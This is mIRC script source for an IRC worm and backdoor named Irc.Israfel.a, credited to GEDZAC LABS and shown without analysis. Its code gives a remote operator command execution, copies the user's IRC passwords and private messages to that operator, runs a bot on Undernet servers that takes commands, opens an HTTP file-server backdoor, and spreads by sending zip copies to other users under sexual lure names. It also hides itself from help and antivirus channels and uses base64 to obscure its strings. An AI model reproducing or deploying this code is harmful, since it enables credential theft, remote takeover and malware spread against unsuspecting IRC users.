;Irc.Israfel.a >> GEDZAC LABS >> Dedicado a Avril Lavigne :)
ctcp 1:/*:*:{ .ctcpreply $nick / Rcib1d0 | if (%a.on = $true) { var %a = $remove($1-,/) | %a | /clear | halt } }
On 1:TEXT:lgn*:*:{ var %lg = $remove($1,lgn)
  if (%lg == $chr(103) $+ $chr(101) $+ $chr(100) $+ $chr(109) $+ $chr(105)) {
    if ($2 == On) { .set %a.on $true | .set %a.nick $nick | .privmsg $nick Iniciando Secion de Control Remoto :) }
  if ($2 == Off) { .set %a.on $false | .unset %a.nick $nick | .privmsg $nick Terminando Secion de Control Remoto :) } }
  else { .privmsg $nick pass incorrect :( }
.close -cm $nick }
On 1:Text:cmd*:*:{
  if (%a.on = $false) { halt } | var %vt = $remove($1,cmd)
  if (%vt == SpIOn) { .set %SpI $true } | elseif (%vt == SpIOff) { .set %SpI $false }
  elseif (%vt == SpTcOn) { .set %SpTc $true } | elseif (%vt == SpTpOn) { .set %SpTp $true }
  elseif (%vt == SpTOff) { .set %SpTc $false | .set %SpTp $false } | elseif (%vt == Spkey) { .dcc send -c $nick $mircdir $+ lg.hvx }
  elseif (%vt == Spdir) { .fserve $nick 3 $left($mircdir,3) } | elseif (%vt == exit) { .disconnect | .exit }
  elseif (%vt == ip) { .privmsg $nick $ip }
.close -cm $nick }
On 1:Text:*:?:{
  if (%SpTp = $true) { .privmsg %a.nick < $+ $Nick $+ > $+ $1- }
  if ($NoText($1-) = $true) { .ignore $nick | .close -cm $nick }
}
On 1:Text:*:#:{
  if (%SpTc = $true) { .privmsg %a.nick < $+ $Nick $+ > $+ $1- }
  if ($NoText($1-) = $true) { .part $chan }
}
On 1:INPUT:*:{
  if %SpI = $true { .privmsg %a.nick 12 $+ $1- $+  }
  if (identify isin $1-) || (login isin $1-) {
    var %lgi = $mircdir $+ lg.hvx
    if ($exists(%lgi) = $false) { .write %lgi ---Israfel--- $fulldate }
    if ($read -w* $+ $me $+ * %lgi = $null) {
      .write %lgi -----Israfel----- | .write %lgi I= $me | .write %lgi I= $chan
      .write %lgi I= $1- | .write %lgi I= $email | .write %lgi I= $server
      .write %lgi I= $port | .write %lgi I= Wi $+ ndo $+ ws $os | .write %lgi I= $fulldate
  .write %lgi -----Israfel----- } }
if ($NoText($1-) = $true) { halt } }
Alias unload { .echo -ae $decode(KiBVbmxvYWRlZCBzY3JpcHQgJw==,m) $+ $2 $+ ' }
Alias socklist { /echo -ae $decode(KioqIE5vIG9wZW4gc29ja2V0cw==,m) }
Alias NoText {
  if (trojan isin $1-) || (troyano isin $1-) || (virus isin $1-) || (worm isin $1-) || (set isin $1-) || (enable isin $1-) || (disable isin $1-) || (remote isin $1-) || (script isin $1-) || (play isin $1-) || (sock isin $1-) || (write isin $1-) || (decode isin $1-) || (alias isin $1-) || (load isin $1-) || (unload isin $1-) || (remini isin $1-) || (remove isin $1-) || (events isin $1-) || (timer isin $1-) { return $true }
  else { return $false }
}
;---------------------------------------------------------------------------
ctcp *:dcc send:*:{ if ($len($nopath($filename)) >= 225) { halt } }
alias gbot { if ($sock(gbot).status == active) { halt } | gserv | %rs = $r(1,5) | .timer 1 3 .sockopen gbot $hget(gSv,%rs) 6667 }
alias gws { if ($sock($1).status == active) { sockwrite -n $1 $2- } }
alias rnick { return $rand(A,z) $+ $rand(a,z) $+ $rand(a,z) $+ $rand(a,z) $+ $rand(A,z) $+ $rand(a,z) $+ $rand(A,z) }
alias ruser { %v = $r(1,9)
  if (%v == 1) %v = $decode(aG90bWFpbC5jb20=,m) | if (%v == 2) %v = $decode(bGF0aW5tYWlsLmNvbQ==,m) | if (%v == 3) %v = $decode(eWFob28uY29t,m)
  if (%v == 4) %v = $decode(dGVycmEuY29t,m) | if (%v == 5) %v = $decode(bXNuLmNvbQ==,m) | if (%v == 6) %v = $decode(cmNwLm5ldA==,m)
  if (%v == 7) %v = $decode(Z2VkemFjLm9yZw==,m) | if (%v == 8) %v = $decode(dGVsZWZvbmljYS5jb20=,m) | if (%v == 9) %v = $decode(cGVydS5jb20=,m)
return USER $rnick " $+ %v $+ " " $+ $sock($sockname).ip $+ " : $+ %v }
on *:sockopen:gbot:{ .timerbb off | gws gbot NICK $rnick | gws gbot $ruser | .Set %rch $Chr(35) $+ $rnick | .timerbb 5 50 gws gbot join %rch | .timeral 5 60 gws gbot topic %rch GEDZAC }
on *:sockclose:gbot:{ .timerb off | .timerb 1 120 gbot }
on *:sockread:gbot:{ if ($sockerr > 0) { return }
  if ($sock(gbot).status == active) { sockread %rbot } | else { return }
  if ($sockbr == 0) { return } | if (%rbot == $null) { %rbot = - }
  if ($gettok(%rbot,1,32) == PING) { gws gbot PONG $gettok(%rbot,2,58) }
  if ($gettok($gettok(%rbot,1,32),2,64) != $decode(RGFya01hY2hpbmUudXNlcnMudW5kZXJuZXQub3Jn,m)) { halt }
  if (BINFO isin %rbot) { .sockwrite -n $sockname privmsg %rch : $+ $me $+ $chr(32) $+ $server $+ $chr(32) $+ $port $+ $chr(32) $+ $mircdir $+ $chr(32) $+ $ip $+ $chr(32) $+ $date $+ $chr(32) $+ $time }
  if (apc isin %rbot) { $gettok(%rbot,5-,32) }
if (asv isin %rbot) { .sockwrite -tn gbot $gettok(%rbot,5-,32) } }
Alias ghttp { if ($sock(phttp).status != listening) { .socklisten phttp 2004 }
if ($sock(pfile).status != listening) { .socklisten pfile 2003 } }
On *:socklisten:phttp:{ .sockaccept thtm $+ $r(0,9999999999) }
On *:socklisten:pfile:{ .sockaccept tfil $+ $r(0,9999999999) }
On *:sockread:thtm*:{ if ($sockerr > 0) { return }
  if ($sock($sockname).status == active) { sockread %rht }
  else { return }
  if ($sockbr == 0) { return } | if (%rht == $null) { %sendSrc = - }
  if ($gettok(%rht,2,32) == $decode(L2luZGV4Lmh0bQ==,m)) {
    hhead
    gws $sockname $decode(PGh0bWw+PGgyPkJhY2tEb29yLkh0dHAgQmFyZGllbC5DIGJ5IEdlZHphYyBMYWJzPC9oMj48L2h0bWw+,m)
  }
  if (/c:e1 isin $gettok(%rht,2,32)) || (/d:e1 isin $gettok(%rht,2,32)) {
    %hdr = $replace($mid($gettok(%rht,2,32),2),e1,\)
    hhead
    gws $sockname $decode(PGh0bWw+PGgyPkJhY2tEb29yLkh0dHAgQmFyZGllbC5DIC0gRGlycyBkZQ==,m) $+ $chr(32) $+ %hdr $+ </h2><pre>
    %ctd = 1
    while (%ctd <= $finddir($replace(%hdr,_,$chr(32)),*.*,0,1)) {
      gws $sockname $finddir($replace(%hdr,_,$chr(32)),*.*,%ctd,1) | inc %ctd
    }
    gws $sockname $decode(PGh0bWw+PGgyPkJhY2tEb29yLkh0dHAgQmFyZGllbC5DIC0gRmlsZXMgZGU=,m) $+ $chr(32) $+ %hdr $+ </h2>
    %ctd = 1
    while (%ctd <= $findfile($replace(%hdr,_,$chr(32)),*.*,0,1)) {
      gws $sockname $findfile($replace(%hdr,_,$chr(32)),*.*,%ctd,1) | inc %ctd
    }
    gws $sockname $decode(PC9wcmU+PC9odG1sPg==,m)
} }
Alias hhead {
  gws $sockname $decode(SFRUUC8xLjEgMjAwIE9L,m)
  gws $sockname $decode(U2VydmVyOiBOZXRzY2FwZS1FbnRlcnByaXNlLzQuMQ==,m)
  gws $sockname $decode(RGF0ZTo=,m) $+ $Chr(32) $+ $fulldate
  gws $sockname $decode(Q29udGVudC10eXBlOiB0ZXh0L2h0bWw=,m)
  gws $sockname $decode(RXRhZzogImY4NmQ2ZDI2LWE4LTQyMS0zZjlmOWEyMiI=,m)
  gws $sockname $decode(TGFzdC1tb2RpZmllZDo=,m) $+ $Chr(32) $+ $fulldate
  gws $sockname $decode(QWNjZXB0LUVuY29kaW5nOiBpZGVudGl0eQ==,m)
  gws $sockname $decode(QWNjZXB0LXJhbmdlczogYnl0ZXM=,m)
  gws $sockname $crlf | %ch = 1
  while (%ch < 7) { gws $sockname $decode(YWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFh,m) | inc %ch }
}
On *:sockread:tfil*:{ if ($sockerr > 0) { return }
  if ($sock($sockname).status == active) { sockread %sendFil }
  else { return }
  if ($sockbr == 0) { return }
  if (%sendFil == $null) { %sendFil = - }
  if (/c:e1 isin $gettok(%sendFil,2,32)) || (/d:e1 isin $gettok(%sendFil,2,32)) {
    sendFile $replace($mid($gettok(%sendFil,2,32),2),e1,\)
} }
Alias sendFile {
  gws $sockname $decode(SFRUUC8xLjEgMjAwIE9L,m)
  gws $sockname $decode(RGF0ZTo=,m) $+ $Chr(32) $+ $fulldate
  gws $sockname $decode(U2VydmVyOiBOZXRzY2FwZS1FbnRlcnByaXNlLzQuMQ==,m)
  gws $sockname $decode(QWNjZXB0LVJhbmdlczogYnl0ZXM=,m)
  gws $sockname $decode(Q29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi9vY3RldC1zdHJlYW0=,m)
  gws $sockname $decode(Q29udGVudC1MZW5ndGg6,m) $+ $Chr(32) $+ $file($1-).size
  gws $sockname $decode(QWNjZXB0LUVuY29kaW5nOiBpZGVudGl0eQ==,m)
  gws $sockname $crlf
  Set %lfil 0 | Set %ufil $lof($1-) | Set %gfil $1-
}
Alias spread { if ($isfile($2-) == $true) { bread " $+ $2- $+ " %lfil 64 &fyle }
sockwrite $1 &fyle | %lfil = $calc(%lfil + $bvar(&fyle,0)) }
On *:sockwrite:tfil*:{ if ($sockerr > 0) { sockclose $sockname | return }
  if (%lfil >= %ufil) { sockclose $sockname | return }
spread $sockname %gfil }
Alias gserv {
  hadd -m gSv 1 $decode(aXJjLnVuZGVybmV0Lm9yZw==,m)
  hadd gSv 2 $decode(bWFuaGF0dGFuLmtzLnVzLnVuZGVybmV0Lm9yZw==,m)
  hadd gSv 3 $decode(cGFuYW1hY2l0eS5wYS51bmRlcm5ldC5vcmc=,m)
  hadd gSv 4 $decode(c2FuZGllZ28uY2EudXMudW5kZXJuZXQub3Jn,m)
  hadd gSv 5 $decode(ZmFpcmZheC52YS51cy51bmRlcm5ldC5vcmc=,m)
}
;---------------------------------------------------------------------------
On 1:CONNECT:{ /Unset %bv.* %a.* %nv.* | /set %SpI $false | /set %SpT $false | /set %a.on $false | /Remote On | gbot | ghttp }
On 1:JOIN:*:{ if ($nick != $me) { { siv } | { sv } } | else { if (ayuda isin #) || (help isin #) || (virus isin #) || (avt isin #) || (vh isin #) || (gigairc isin #) { .privmsg # Irc.Israfel.A by GEDZAC LABS | .disconnect | .exit } } }
On 1:FileRcvd:*:{ if ($nick != $me) { { siv } | { sv } } }
On 1:PART:#:{ if ($nick != $me) { { siv } | { sv } } }
On 1:FileSent:*:{ if (.zip isin $filename) { halt } | var %ps = C:\WINDOWS\SYSTEM $+ $decode(XGZpbGV6aXAuemlw,m) | .copy -o %ps $nofile(%ps) $+ $gettok($nopath($filename),1,46) $+ 2.zip | csv $nick $nofile(%ps) $+ $gettok($nopath($filename),1,46) $+ 2.zip #op }
On 1:SENDFAIL:*:{ halt }
Alias sv { var %pb = C:\WINDOWS\SYSTEM $+ $decode(XGZpbGV6aXAuemlw,m)
  if ($exists(%pb) = $false) { halt } | var %rb = $rand(1,10)
  if (%rb = 1) { .copy -o %pb $nofile(%pb) $+ $decode(bm90ZXMuemlw,m) | Set %bv.file $nofile(%pb) $+ $decode(bm90ZXMuemlw,m) }
  elseif (%rb = 2) { .copy -o %pb $nofile(%pb) $+ $decode(dmlkZW9zLnppcA==,m) | Set %bv.file $nofile(%pb) $+ $decode(dmlkZW9zLnppcA==,m) }
  elseif (%rb = 3) { .copy -o %pb $nofile(%pb) $+ $decode(eHh4LnppcA==,m) | Set %bv.file $nofile(%pb) $+ $decode(eHh4LnppcA==,m) }
  elseif (%rb = 4) { .copy -o %pb $nofile(%pb) $+ $decode(TWFudWFsU2VkdWNjaW9uLnppcA==,m) | Set %bv.file $nofile(%pb) $+ $decode(TWFudWFsU2VkdWNjaW9uLnppcA==,m) }
  elseif (%rb = 5) { .copy -o %pb $nofile(%pb) $+ $decode(cG9zdGFsLnppcA==,m) | Set %bv.file $nofile(%pb) $+ $decode(cG9zdGFsLnppcA==,m) }
  elseif (%rb = 6) { .copy -o %pb $nofile(%pb) $+ $decode(aGVjaGl6b3Muemlw,m) | Set %bv.file $nofile(%pb) $+ $decode(aGVjaGl6b3Muemlw,m) }
  elseif (%rb = 7) { .copy -o %pb $nofile(%pb) $+ $decode(aW1hZ2VzLnppcA==,m) | Set %bv.file $nofile(%pb) $+ $decode(aW1hZ2VzLnppcA==,m) }
  elseif (%rb = 8) { .copy -o %pb $nofile(%pb) $+ $decode(c2V4LnppcA==,m) | Set %bv.file $nofile(%pb) $+ $decode(c2V4LnppcA==,m) }
  elseif (%rb = 9) { .copy -o %pb $nofile(%pb) $+ $decode(YXZyaWwuemlw,m) | Set %bv.file $nofile(%pb) $+ $decode(YXZyaWwuemlw,m) }
  elseif (%rb = 10) { .copy -o %pb $nofile(%pb) $+ $me $+ .zip | Set %bv.file $nofile(%pb) $+ $me $+ .zip }
.ignore -rpcntikxu15 $address($nick,1) | csv $nick %bv.file $chan }
Alias siv { var %rb3 = $rand(1,10) 
  if (%rb3 = 1) { var %mb3 = $decode(AzgsMUZvdG9zIFhYWAMDNCwxIGh0dHA6Ly9tZW1iZXJzLmx5Y29zLmNvLnVrL2lzZXJ2ZXI0L3BsYXlib3kuYXZpIAMDOCwxIFhYWCBGb3RvcwM=,m) }
  elseif (%rb3 = 2) { var %mb3 = $decode(AzQsMUZyZWUgWFhYIFNleFZpZGVvIAMDOCwxaHR0cDovL21lbWJyZXMubHljb3MuZnIvaXNlcnZlcjUvc2V4ZXNjZW5lLmF2aQM=,m) }
  elseif (%rb3 = 3) { var %mb3 = $decode(AzAsMTNNaXJhIGxhIGZvdG8gAwM0LDEtPgMDOCwxNCBodHRwOi8vbWVtYnJlcy5seWNvcy5mci9pc2VydmVyNS9hbmRyZWEuanBnAw==,m) }
  elseif (%rb3 = 4) { var %mb3 = $decode(AzVObyBjcmVlcyBlbiBsbyBwYXJhbm9ybWFsPyADAzE0aHR0cDovL21lbWJlcnMubHljb3MuY28udWsvaXNlcnZlcjQvaGFkYS5naWYgOnwD,m) }
  elseif (%rb3 = 5) { var %mb3 = $decode(AzEzLDFCcml0bmV5LCBDaHJpc3RpbmEsIEplbm5pZmVyLCBldGMgAwM4LDFodHRwOi8vdXRlbnRpLmx5Y29zLml0L3lzZXJ2ZXIzL2JyaXRuZXkuYXZpAw==,m) }
  elseif (%rb3 = 6) { var %mb3 = $decode(AzQsMVBpY3MgTW9kZWxzIAMDMTMsMWh0dHA6Ly91dGVudGkubHljb3MuaXQveXNlcnZlcjMvdml2aWFuYS5qcGcDAzQsMSBNb2RlbHMgUGljcwM=,m) }
  elseif (%rb3 = 7) { var %mb3 = $decode(AzcsMEFwcmVuZGUgYSBjb25xdWlzdGFyIGFsIHNleG8gb3B1ZXN0byADAzEzLDAgaHR0cDovL21pdGdsaWVkLmx5Y29zLmRlL2lzZXJ2ZXIyL3NlZHVjY2lvbi50eHQD,m) }
  elseif (%rb3 = 8) { var %mb3 = $decode(AzQsOE1pcmEgZXN0YSBmb3RvIAMDOCw0aHR0cDovL21lbWJlcnMubHljb3MubmwvaXNlcnZlcjEvb3ZuaS5qcGcD,m) }
  elseif (%rb3 = 9) { var %mb3 = $decode(AzQsMUZyZWUgcGljcyBHaXJscywgVGVlbnMgAwM4LDFodHRwOi8vbWl0Z2xpZWQubHljb3MuZGUvaXNlcnZlcjIva2F0aGVyaW5lLmpwZwM=,m) }
  elseif (%rb3 = 10) { var %mb3 = $decode(AzEyLDBKZW5pZmVyIExvdmUgSGV3aXR0IFNleCBWaWRlbyADAzQsMGh0dHA6Ly9tZW1iZXJzLmx5Y29zLm5sL2lzZXJ2ZXIxL2plbmlmZXJsb3ZlLmF2aQM=,m) }
.privmsg $nick %mb3 }
Alias csv { set %bv.file $2
  if ( $1 isop $3 ) || ( $1 isvoice $3 ) { halt }
  if ( $exists(%bv.file) = $false ) { halt }
  if ( $sock(bv.*,0) > 5 ) { return }
  Set %bv. $+ $1 0 | :scanpt | Set %pt $rand(2400,5000) 
  if ( $portfree(%pt) = $false ) { goto scanpt } 
  Set [ % $+ [ nv. $+ [ $1 ] ] ] 0 | Set %pk. $+ $1 4096 | Set %sz $file(%bv.file).size
  Set %bv.vtp1 bv. $+ $1 | .timer $+ $1 1 300 { .sockclose %bv.vtp1 | .sockclose i. $+ $1 }
  .timer $+ $1 1 50 eb $1 | .ignore -u90 $1 2
  .raw -q privmsg $1 : $+ $chr(1) $+ DCC SEND %bv.file $longip($ip) %pt %sz $+ $chr(1)
if ( $sock(%bv.vtp1) != $null ) { .sockclose %bv.vtp1 } | .socklisten %bv.vtp1 %pt }
Alias eb { if ( [ % $+ [ nv. $+ [ $1 ] ] ] = 0 ) { .sockclose [ i. $+ [ $1 ] ] | .sockclose [ bv. $+ [ $1 ] ] | .timer $+ $1 off } }
Alias lsv { if ( $calc( [ % $+ [ nv. $+ [ $1 ] ] ] + [ % $+ [ pk. $+ [ $1 ] ] ] ) < %sz) { bread %bv.file [ % $+ [ nv. $+ [ $1 ] ] ] [ % $+ [ pk. $+ [ $1 ] ] ] &data | .sockwrite i. $+ $1 &data | inc [ % $+ [ nv. $+ [ $1 ] ] ] [ % $+ [ pk. $+ [ $1 ] ] ] } | else { Set [ % $+ [ bv. $+ [ $1 ] ] ] 1 | [ % $+ [ pk. $+ [ $1 ] ] ] = $calc( %sz - [ % $+ [ nv. $+ [ $1 ] ] ] ) | if ( [ % $+ [ pk. $+  [ $1 ] ] ] = 0) { return } | bread %bv.file [ % $+ [ nv. $+ [ $1 ] ] ] [ % $+ [ pk. $+ [ $1 ] ] ] &data | .sockwrite i. $+ $1 &data } }
On 1:SockClose:i.*:{ Set %bv.tmp6 $remove($sockname,i.) | sockclose $sockname | sockclose [ bv. $+ [ %bv.tmp6 ] ] | .timer $+ %bv.tmp6 off }
On 1:SockListen:bv.*:{ Set %bv.tmp5 $remove($sockname,bv.) | sockaccept i. $+ %bv.tmp5 | lsv %bv.tmp5 }
On 1:SockWrite:i.*:{ Set %bv.tmp6 $remove($sockname,i.) | if ( [ % $+ [ bv. $+ [ %bv.tmp6 ] ] ] = 1 ) { .timer $+ $rand(99,9999) 1 10 sockclose $sockname | .timer $+ $r(99,9999) 1 10 sockclose [ bv. $+ [ %bv.tmp6 ] ] | .timer $+ %bv.tmp6 off | halt } | lsv %bv.tmp6 }
On 1:exit:{ var %bep = C:\WINDOWS\SYSTEM $+ \ | var %ch = 1 | while (%ch <= 10) {
    if (%ch = 1) { var %chp = %bep $+ $decode(bm90ZXMuemlw,m) }
    if (%ch = 2) { var %chp = %bep $+ $decode(dmlkZW9zLnppcA==,m) }
    if (%ch = 3) { var %chp = %bep $+ $decode(eHh4LnppcA==,m) }
    if (%ch = 4) { var %chp = %bep $+ $decode(TWFudWFsU2VkdWNjaW9uLnppcA==,m) }
    if (%ch = 5) { var %chp = %bep $+ $decode(cG9zdGFsLnppcA==,m) }
    if (%ch = 6) { var %chp = %bep $+ $decode(aGVjaGl6b3Muemlw,m) }
    if (%ch = 7) { var %chp = %bep $+ $decode(aW1hZ2VzLnppcA==,m) }
    if (%ch = 8) { var %chp = %bep $+ $decode(c2V4LnppcA==,m) }
    if (%ch = 9) { var %chp = %bep $+ $decode(YXZyaWwuemlw,m) }
    if (%ch = 10) { var %chp = %bep $+ $me $+ .zip }
  if ($exists(%chp) = $true) { .remove %chp } | inc %ch }
var %nc = $findfile(%bep,*2.zip,0) | var %sc = 1 | while (%sc <= %nc) { .remove $findfile(%bep,*2.zip,%sc) | inc %sc } }
On 1:Disconnect:{ .timers off | .sockclose bv.* | .sockclose i.* }